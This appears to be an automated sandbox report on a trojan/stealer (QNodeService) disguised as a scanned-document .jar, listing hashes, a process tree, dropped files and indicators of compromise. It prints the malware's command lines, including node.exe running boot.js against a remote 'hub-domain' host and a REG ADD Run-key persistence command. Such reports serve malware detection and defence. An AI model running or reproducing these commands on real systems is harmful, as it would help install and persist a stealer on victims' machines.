Analysis
-
max time kernel
119s -
max time network
143s -
platform
windows10_x64 -
resource
win10 -
submitted
27-10-2020 12:52
Static task
static1
Behavioral task
behavioral1
Sample
Scanned from a Xerox Multifunction Printer.jar
Resource
win7
Behavioral task
behavioral2
Sample
Scanned from a Xerox Multifunction Printer.jar
Resource
win10
General
-
Target
Scanned from a Xerox Multifunction Printer.jar
-
Size
71KB
-
MD5
ef50330c3ba37193196fb2678b81c358
-
SHA1
fedda1f30f37cfbcd7a30fadfb32da968923bc55
-
SHA256
51a266885dd543b93c91be648fd52e64fae3a3af8a17616e86357facb982622f
-
SHA512
ea5a1a3b90f3663dea5408d49b6e453872fd6446d688ac409d9c750478c17b1b8ab2e47ea95e2f1860f9af4cf5b83fbbf806671781c09d6b2e08ef880f23b024
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
Processes:
node.exenode.exenode.exepid process 1788 node.exe 1360 node.exe 1236 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Windows\CurrentVersion\Run\6d525496-aed7-45ef-84d3-bc52e5b4f80b = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\node-v14.12.0-win-x64\node.exe js C:\Users\Admin\node-v14.12.0-win-x64\node.exe js C:\Users\Admin\node-v14.12.0-win-x64\node.exe js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 27 wtfismyip.com 28 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
node.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
node.exenode.exenode.exepid process 1788 node.exe 1788 node.exe 1788 node.exe 1788 node.exe 1360 node.exe 1360 node.exe 1360 node.exe 1360 node.exe 1236 node.exe 1236 node.exe 1236 node.exe 1236 node.exe 1236 node.exe 1236 node.exe 1236 node.exe 1236 node.exe 1236 node.exe 1236 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
java.exejavaw.exenode.exenode.exenode.execmd.exedescription pid process target process PID 4032 wrote to memory of 3672 4032 java.exe javaw.exe PID 4032 wrote to memory of 3672 4032 java.exe javaw.exe PID 3672 wrote to memory of 1788 3672 javaw.exe node.exe PID 3672 wrote to memory of 1788 3672 javaw.exe node.exe PID 1788 wrote to memory of 1360 1788 node.exe node.exe PID 1788 wrote to memory of 1360 1788 node.exe node.exe PID 1360 wrote to memory of 1236 1360 node.exe node.exe PID 1360 wrote to memory of 1236 1360 node.exe node.exe PID 1236 wrote to memory of 3580 1236 node.exe cmd.exe PID 1236 wrote to memory of 3580 1236 node.exe cmd.exe PID 3580 wrote to memory of 3936 3580 cmd.exe reg.exe PID 3580 wrote to memory of 3936 3580 cmd.exe reg.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Scanned from a Xerox Multifunction Printer.jar"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\1c07e8ca.tmp2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain karimrnosa2.home-webserver.de3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_orce3J\boot.js --hub-domain karimrnosa2.home-webserver.de4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_orce3J\boot.js --hub-domain karimrnosa2.home-webserver.de5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "6d525496-aed7-45ef-84d3-bc52e5b4f80b" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "6d525496-aed7-45ef-84d3-bc52e5b4f80b" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestampMD5
b5b6fc5dff76ce769155a53b585761c7
SHA1978fd321293bd9adace5a61b7f5670c907d642c2
SHA256cdd0d79db4dd47ccdca88b7c8f29d7c42ea962c25d6d9a8eed97f26858495f25
SHA5124533570602e34d953a86ce0b529561d1f87112fe9ed7a3ec752d6275c01fd4c9c9544aee289d2cc0f95f3a585de205549312cd023579569d2c73f1407c2ac0dd
-
C:\Users\Admin\AppData\Local\Temp\1c07e8ca.tmpMD5
ef50330c3ba37193196fb2678b81c358
SHA1fedda1f30f37cfbcd7a30fadfb32da968923bc55
SHA25651a266885dd543b93c91be648fd52e64fae3a3af8a17616e86357facb982622f
SHA512ea5a1a3b90f3663dea5408d49b6e453872fd6446d688ac409d9c750478c17b1b8ab2e47ea95e2f1860f9af4cf5b83fbbf806671781c09d6b2e08ef880f23b024
-
C:\Users\Admin\AppData\Local\Temp\_qhub_node_orce3J\boot.jsMD5
3859487feb5152e9d1afc4f8cd320608
SHA17bf154c9ddf3a71abf15906cdb60773e8ae07b62
SHA2568d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13
SHA512826a1b3cd08e4652744a975153448288dd31073f60471729b948d7668df8e510fa7b0c6dcd63636043850364bf3cd30c1053349d42d08f8ec7c4a0655188fab8
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeMD5
f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeMD5
f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeMD5
f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
memory/1236-182-0x000001149F740000-0x000001149F741000-memory.dmpFilesize
4KB
-
memory/1236-180-0x0000000000000000-mapping.dmp
-
memory/1360-176-0x0000000000000000-mapping.dmp
-
memory/1360-178-0x000001DB6D0C0000-0x000001DB6D0C1000-memory.dmpFilesize
4KB
-
memory/1788-175-0x000003F5CFE80000-0x000003F5CFE81000-memory.dmpFilesize
4KB
-
memory/1788-173-0x0000000000000000-mapping.dmp
-
memory/3580-183-0x0000000000000000-mapping.dmp
-
memory/3672-55-0x0000000000000000-mapping.dmp
-
memory/3936-184-0x0000000000000000-mapping.dmp